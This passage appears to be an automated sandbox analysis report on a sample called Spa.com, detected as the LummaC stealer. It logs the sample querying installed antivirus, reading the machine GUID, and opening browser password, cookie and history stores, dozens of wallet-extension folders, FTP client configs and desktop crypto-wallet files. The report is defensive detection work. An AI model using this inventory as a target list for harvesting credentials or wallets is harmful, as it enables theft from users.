            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Spa.com, 0000000A.00000003.2228208170.0000000001D50000.00000004.00000020.00020000.00000000.sdmp, Spa.com, 0000000A.00000003.2227913157.0000000001D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: Spa.com PID: 7600, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: Spa.com, 0000000A.00000002.2229354757.0000000001CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
            Source: Spa.com, 0000000A.00000002.2229354757.0000000001CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
            Source: Spa.com, 0000000A.00000002.2229354757.0000000001CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
            Source: Spa.com, 0000000A.00000003.2227913157.0000000001D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.lib<
            Source: Spa.com, 0000000A.00000002.2229354757.0000000001CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: Spa.com, 0000000A.00000002.2229354757.0000000001CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: Spa.com, 0000000A.00000003.2227913157.0000000001D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","
            Source: Spa.com, 0000000A.00000003.2228131384.0000000004475000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: Spa.com, 0000000A.00000003.2227913157.0000000001D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\459250\Spa.comDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
